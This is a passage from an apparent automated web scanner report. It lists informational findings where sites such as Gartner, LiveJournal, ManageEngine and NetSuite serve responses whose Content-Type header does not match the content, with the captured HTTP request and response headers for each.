Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B; mbox=check#true#1303736408|session#1303736347554-914602#1303738208

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 12:58:57 GMT
X-Varnish: 1310978028
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 10967

var ESET_Store = {
selected: [],
renew_prices: {},
eav_radio_checked: false,
ess_radio_checked: false,


init: function() {
this.setTabEvents();
this.setRenewQuantity();
...[SNIP]...

33.71. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.fusionvm.com
Path:   /FusionVM/DesktopDefault.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

POST /FusionVM/DesktopDefault.aspx HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
Referer: https://www.fusionvm.com/FusionVM/DesktopDefault.aspx
Origin: https://www.fusionvm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQQASDQQ=MNOLHEFCGKBHGOHLANCBPEKB; CriticalWatch_WinMgmt=1ea476ea-f298-43b7-b986-76b4c2ad1a2b; ASP.NET_SessionId=ldofgy3miecclj01ixxgal4x; __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; __utmc=61526075; __utmb=61526075.1.10.1303736107
Content-Length: 5126

_IG_CSS_LINKS_=&ctl01xDesktopThreePanes1xThreePanesxctl05xAdvisoriesGrid=&ctl01$DesktopThreePanes1$ThreePanes$ctl01$SigninDBControl$password=&ctl01$DesktopThreePanes1$ThreePanes$ctl01$SigninDBControl$
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Mon, 25 Apr 2011 12:54:56 GMT
Content-Length: 5335

/FusionVM/Images/FooterBackground2.gif/FusionVM/Images/CW-Logo-NoTag-Rev-MinSize.gif20112011.3.0.27<&>0ctl01$Banner$UserSessionTimer1$WebAsyncRefreshPanel1<&>0_0.08469181740656495<&>0ctl01$Banner$User
...[SNIP]...

33.72. http://www.gartner.com/include/webtrends.jsp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.gartner.com
Path:   /include/webtrends.jsp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /include/webtrends.jsp HTTP/1.1
Host: www.gartner.com
Proxy-Connection: keep-alive
Referer: http://www.gartner.com/DisplayDocument?doc_cd=127481
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WebLogicSession=cSYnN1vJnb1Nx84rkvK9h3y2Z1JSqHc4Q7GnchMG2ZDySdxm2Pns!475228577; WT_FPC=id=173.193.214.243-1722167968.30147392:lv=1303732853510:ss=1303732853510; TS83f541=32d23d3d5a761af07eb8e7078f5d2a8c0621405c7f8621844db564c8

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:10:48 GMT
Content-type: text/html; charset=ISO8859_1
Date: Mon, 25 Apr 2011 12:10:48 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
X-PvInfo: [S10203.C10821.A151026.RA0.G24F27.UD4EB7C80].[OT/html.OG/pages]
Vary: Accept-Encoding
Content-Length: 22376

<!-- START OF Advanced SmartSource Data Collector TAG -->
<!-- Copyright (c) 1996-2006 WebTrends Inc. All rights reserved.-->
<!-- $DateTime: 2006/03/09 14:15:22 $ -->
<!-- 2006/10/30: Modified by
...[SNIP]...

33.73. http://www.gartner.com/technology/include/metricsHelper.jsp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.gartner.com
Path:   /technology/include/metricsHelper.jsp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /technology/include/metricsHelper.jsp HTTP/1.1
Host: www.gartner.com
Proxy-Connection: keep-alive
Referer: http://www.gartner.com/technology/contact/contact_gartner.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WebLogicSession=cSYnN1vJnb1Nx84rkvK9h3y2Z1JSqHc4Q7GnchMG2ZDySdxm2Pns!475228577; WT_FPC=id=173.193.214.243-1722167968.30147392:lv=1303733464197:ss=1303732853510; MKTSESSIONID=2pxxN1kBM49w9XHgl67B0BKnWmRD24ZpTvjK6St3Ncw4TQzX7by2!-1018522061; TS83f541=32d23d3d5a761af07eb8e7078f5d2a8c0621405c7f8621844db564c8

Response

HTTP/1.1 200 OK
Connection: keep-alive
Date: Mon, 25 Apr 2011 12:11:15 GMT
Content-length: 277
Content-type: text/html; charset=ISO-8859-1
Date: Mon, 25 Apr 2011 12:11:15 GMT
X-Powered-By: Servlet/2.4 JSP/2.0
X-PvInfo: [S10203.C10821.A151026.RA0.G24F27.U8B62F8FE].[OT/html.OG/pages]
Vary: Accept-Encoding


var metricsUserClass = "Visitor";
var metricsLoginTxt = "";
var metricsEmailTxt = "";
var metricsCity = "";
var metricsStateCode =
...[SNIP]...

33.74. http://www.iveco-ptc.spb.ru/images/menu/4d95d099884d7.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.iveco-ptc.spb.ru
Path:   /images/menu/4d95d099884d7.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/menu/4d95d099884d7.gif HTTP/1.1
Host: www.iveco-ptc.spb.ru
Proxy-Connection: keep-alive
Referer: http://www.iveco-ptc.spb.ru/?_openstat=ZGlyZWN0LnlhbmRleC5ydTszMjIwNzI7NDQzMjM3O3lhbmRleC5ydTpndWFyYW50ZWU
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=00fce441a740fea86b906e1e933c9d1b

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:21:27 GMT
Content-Type: image/gif
Connection: keep-alive
Last-Modified: Fri, 01 Apr 2011 13:18:17 GMT
ETag: "205e85-3ab6-49fdb3e329840"
Accept-Ranges: bytes
Content-Length: 15030

.PNG
.
...IHDR...c...V.....T..... .IDATx.t.y.&.U.x..".[s......z.Z.jI ...6K..&!. @.....li0.p.c...3....6.3#d0.6.9.XFR.....VC.KUuUuUf..e~kD.w..?^|......>Y.._D.w........?}.........C..$C.P..............2
...[SNIP]...

33.75. http://www.livejournal.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.livejournal.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.livejournal.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164322722.1303741260.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=164322722.814293328.1303741260.1303741260.1303741260.1; __utmc=164322722; __utmb=164322722.1.10.1303741260; ljuniq=yNcQcrN8FpUfQop:1303741249:pgstats0:m0

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Mon, 25 Apr 2011 14:48:47 GMT
Content-Type: text/plain; charset=UTF-8
Connection: close
X-AWS-Id: ws13
Last-Modified: Mon, 15 Dec 2008 21:35:16 GMT
ETag: "4b0e4f-1466-45e1c9e5f8d00"
Content-Length: 5222
X-Varnish: 1971688293 1956434700
Age: 97599
Via: 1.1 varnish

..............(...F...........h...n... .............. ..............(....... ......................................................................................................D.....DDD....D.sD..
...[SNIP]...

33.76. http://www.livejournal.com/tools/endpoints/journalspotlight.bml  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.livejournal.com
Path:   /tools/endpoints/journalspotlight.bml

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain JSON.

Request

GET /tools/endpoints/journalspotlight.bml?skip=1&limit=&show_userpics=1&user=&_rand=0.36380812083370984 HTTP/1.1
Host: www.livejournal.com
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164322722.1303741260.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=164322722.814293328.1303741260.1303741260.1303741260.1; __utmc=164322722; __utmb=164322722.1.10.1303741260

Response

HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Mon, 25 Apr 2011 14:35:25 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-AWS-Id: ws15
Set-Cookie: ljuniq=Xw061catQYuvMxT:1303742123:pgstats0:m0; expires=Friday, 24-Jun-2011 14:35:23 GMT; domain=.livejournal.com; path=/
Cache-Control: private, proxy-revalidate
ETag: "768345d85a0645590662a213040f76ec"
Vary: Accept-Encoding
Content-Language: en
X-Varnish: 774812408
Age: 0
Via: 1.1 varnish
Content-Length: 2875

{"text":"<table width='100%'><tr><td valign='top' rowspan='2' style='padding-right: 5px;'>\n<div class='normal-users'>\n<ul class='nostyle pkg'>\n<li class='spotlight-1 with-userpic'><span class='user
...[SNIP]...

33.77. http://www.manageengine.com/images/bandwidth-monitoring.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.manageengine.com
Path:   /images/bandwidth-monitoring.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/bandwidth-monitoring.gif HTTP/1.1
Host: www.manageengine.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.14.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:15:19 GMT
Server: Apache
Last-Modified: Mon, 18 Jan 2010 13:14:51 GMT
ETag: "aad2-47d70236d08c0"
Accept-Ranges: bytes
Content-Length: 43730
Cache-Control: max-age=2592000
Expires: Wed, 25 May 2011 12:15:19 GMT
Content-Type: image/gif

.PNG
.
...IHDR...g...K........o....PLTE...x.x.....;.........}.}..w........................jik...l..........]........H......r.......................i..........j.............ef.....i......i.........vW
...[SNIP]...

33.78. http://www.manageengine.com/images/ip-sla-voip-monitoring.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.manageengine.com
Path:   /images/ip-sla-voip-monitoring.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/ip-sla-voip-monitoring.gif HTTP/1.1
Host: www.manageengine.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.14.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:15:20 GMT
Server: Apache
Last-Modified: Mon, 18 Jan 2010 13:14:51 GMT
ETag: "6890-47d70236d08c0"
Accept-Ranges: bytes
Content-Length: 26768
Cache-Control: max-age=2592000
Expires: Wed, 25 May 2011 12:15:20 GMT
Content-Type: image/gif

.PNG
.
...IHDR...r...n.......c.....PLTE.................q.........m.........................._.................................11.......................................(q............................
...[SNIP]...

33.79. http://www.manageengine.com/images/network-configuration-management.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.manageengine.com
Path:   /images/network-configuration-management.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/network-configuration-management.gif HTTP/1.1
Host: www.manageengine.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.14.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:15:20 GMT
Server: Apache
Last-Modified: Mon, 18 Jan 2010 13:14:51 GMT
ETag: "612b-47d70236d08c0"
Accept-Ranges: bytes
Content-Length: 24875
Cache-Control: max-age=2592000
Expires: Wed, 25 May 2011 12:15:20 GMT
Content-Type: image/gif

.PNG
.
...IHDR.......<.....@G......PLTE.....Q........Ap.6...s.............................Al.......................l...............................................................i..............7...
...[SNIP]...

33.80. http://www.manageengine.com/images/network-health-monitoring.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.manageengine.com
Path:   /images/network-health-monitoring.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/network-health-monitoring.gif HTTP/1.1
Host: www.manageengine.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.14.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:15:19 GMT
Server: Apache
Last-Modified: Mon, 18 Jan 2010 13:14:51 GMT
ETag: "8aa9-47d70236d08c0"
Accept-Ranges: bytes
Content-Length: 35497
Cache-Control: max-age=2592000
Expires: Wed, 25 May 2011 12:15:19 GMT
Content-Type: image/gif

.PNG
.
...IHDR...D.........    .l....PLTE................--..............................3q.dea.....................q..x........m........Q.Q....m.gi....G.H.....................Jt......l..Rh.m......;..
...[SNIP]...

33.81. http://www.manageengine.com/images/network-mapping.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.manageengine.com
Path:   /images/network-mapping.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/network-mapping.gif HTTP/1.1
Host: www.manageengine.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.14.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:15:19 GMT
Server: Apache
Last-Modified: Mon, 18 Jan 2010 13:14:51 GMT
ETag: "6a13-47d70236d08c0"
Accept-Ranges: bytes
Content-Length: 27155
Cache-Control: max-age=2592000
Expires: Wed, 25 May 2011 12:15:19 GMT
Content-Type: image/gif

.PNG
.
...IHDR.............a.[.....PLTEk.h..................NNO...........d...^.]......`...............}.|||...jq..l.......rt....kkk..........Y.........&"....M...aaa......sss....................V.iH
...[SNIP]...

33.82. http://www.manageengine.com/images/traffic-analysis.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.manageengine.com
Path:   /images/traffic-analysis.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/traffic-analysis.gif HTTP/1.1
Host: www.manageengine.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.14.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:15:19 GMT
Server: Apache
Last-Modified: Mon, 18 Jan 2010 13:14:51 GMT
ETag: "68df-47d70236d08c0"
Accept-Ranges: bytes
Content-Length: 26847
Cache-Control: max-age=2592000
Expires: Wed, 25 May 2011 12:15:19 GMT
Content-Type: image/gif

.PNG
.
...IHDR...?.........h`.{....PLTE..................u....Y.......pX...Ej.........................kk.#U..................K.....................}}|..............f...X....m........................
...[SNIP]...

33.83. http://www.manageengine.com/images/wan-monitoring.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.manageengine.com
Path:   /images/wan-monitoring.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/wan-monitoring.gif HTTP/1.1
Host: www.manageengine.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.14.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:15:19 GMT
Server: Apache
Last-Modified: Mon, 18 Jan 2010 13:14:51 GMT
ETag: "8252-47d70236d08c0"
Accept-Ranges: bytes
Content-Length: 33362
Cache-Control: max-age=2592000
Expires: Wed, 25 May 2011 12:15:19 GMT
Content-Type: image/gif

.PNG
.
...IHDR.......=.....w8K@....PLTEp.............cg..\l...............k......f..........................Z...........q.q..a..........................................r.'......mrr7pI......F.R......
...[SNIP]...

33.84. http://www.netsuite.com/portal/javascript/effects.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.netsuite.com
Path:   /portal/javascript/effects.js

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /portal/javascript/effects.js HTTP/1.1
Host: www.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/products/ecommerce/website-hosting.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NS_VER=2011.1.0; __utmz=1.1303742452.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=k23zN1HJzNw2PWHTMzr6q1LqT1Q41y9Tz2M0V9JvpTH0mJ5TfxDLbGQpDm2qpc2ThmqSMyK39KWhLDnCtK6fYxHWtxqSfGGZGG53PyJw5wXyXYk1y7kppJz4hQqHll7q!-577847599; NLVisitorId=rcHW8495Af7oGhFy; NLShopperId=rcHW8495AQLpGtOI; bn_u=6923519460848807096; __utma=1.1781939456.1303742452.1303742452.1303742452.1; __utmc=1; __utmb=1.5.10.1303742452; mbox=session#1303736347554-914602#1303745022|PC#1303736347554-914602.17#1304952762|check#true#1303743222; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fpage_not_found.shtml%22%2C%22r%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fpages%2Fportal%2Fpage_not_found.jspinternal%3DT%22%2C%22t%22%3A1303743275975%2C%22u%22%3A%226923519460848807096%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fproducts%2Fecommerce%2Fwebsite-hosting.shtml%22%2C%22l%22%3A%22Ecommerce%20-%20SEO%22%2C%22de%22%3A%7B%22su%22%3A%22NetSuite%20for%20mid-sized%20businesses%20adds%20advanced%20accounting%2C%20customer%20relationship%20management%2C%20and%20SFA%20to%20the%20NetSuite%20family.%20Includes%3A%20NetSuite%20Accounting%2C%20NetSuite%20CRM%2C%20NetSuite%20SFA%2C%20NetSuite%20Knowledge%20Base%2C%20and%20NetSuite%20Vendor%20Center.%22%2C%22ti%22%3A%22NetSuite%20%7C%20Form%22%2C%22nw%22%3A173%2C%22nl%22%3A46%7D%7D

Response

HTTP/1.1 200 OK
Server: Apache
Content-Disposition: inline;filename*=utf-8''effects.js
NS_RTIMER_COMPOSITE: 1564836203:73686F702D6A6176613030342E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=2976
Date: Mon, 25 Apr 2011 14:54:25 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 38227

// script.aculo.us effects.js v1.7.1_beta2, Sat Apr 28 15:20:12 CEST 2007

// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// Contributors:
// Justin Palmer (htt
...[SNIP]...

33.85. http://www.netsuite.com/portal/javascript/prototype.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.netsuite.com
Path:   /portal/javascript/prototype.js

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /portal/javascript/prototype.js HTTP/1.1
Host: www.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/products/ecommerce/website-hosting.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NS_VER=2011.1.0; __utmz=1.1303742452.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=k23zN1HJzNw2PWHTMzr6q1LqT1Q41y9Tz2M0V9JvpTH0mJ5TfxDLbGQpDm2qpc2ThmqSMyK39KWhLDnCtK6fYxHWtxqSfGGZGG53PyJw5wXyXYk1y7kppJz4hQqHll7q!-577847599; NLVisitorId=rcHW8495Af7oGhFy; NLShopperId=rcHW8495AQLpGtOI; bn_u=6923519460848807096; __utma=1.1781939456.1303742452.1303742452.1303742452.1; __utmc=1; __utmb=1.5.10.1303742452; mbox=session#1303736347554-914602#1303745022|PC#1303736347554-914602.17#1304952762|check#true#1303743222; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fpage_not_found.shtml%22%2C%22r%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fpages%2Fportal%2Fpage_not_found.jspinternal%3DT%22%2C%22t%22%3A1303743275975%2C%22u%22%3A%226923519460848807096%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fproducts%2Fecommerce%2Fwebsite-hosting.shtml%22%2C%22l%22%3A%22Ecommerce%20-%20SEO%22%2C%22de%22%3A%7B%22su%22%3A%22NetSuite%20for%20mid-sized%20businesses%20adds%20advanced%20accounting%2C%20customer%20relationship%20management%2C%20and%20SFA%20to%20the%20NetSuite%20family.%20Includes%3A%20NetSuite%20Accounting%2C%20NetSuite%20CRM%2C%20NetSuite%20SFA%2C%20NetSuite%20Knowledge%20Base%2C%20and%20NetSuite%20Vendor%20Center.%22%2C%22ti%22%3A%22NetSuite%20%7C%20Form%22%2C%22nw%22%3A173%2C%22nl%22%3A46%7D%7D

Response

HTTP/1.1 200 OK
Server: Apache
Content-Disposition: inline;filename="prototype.js"
NS_RTIMER_COMPOSITE: -102598731:73686F702D6A6176613031342E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=2627
Date: Mon, 25 Apr 2011 14:54:25 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 99594

/* Prototype JavaScript framework, version 1.5.1.1
* (c) 2005-2007 Sam Stephenson
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see the Prot
...[SNIP]...

33.86. http://www.smpone.com/javascript/common.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.smpone.com
Path:   /javascript/common.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /javascript/common.php HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/?gclid=CLbB86LPt6gCFSIRNAod2E3lCQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
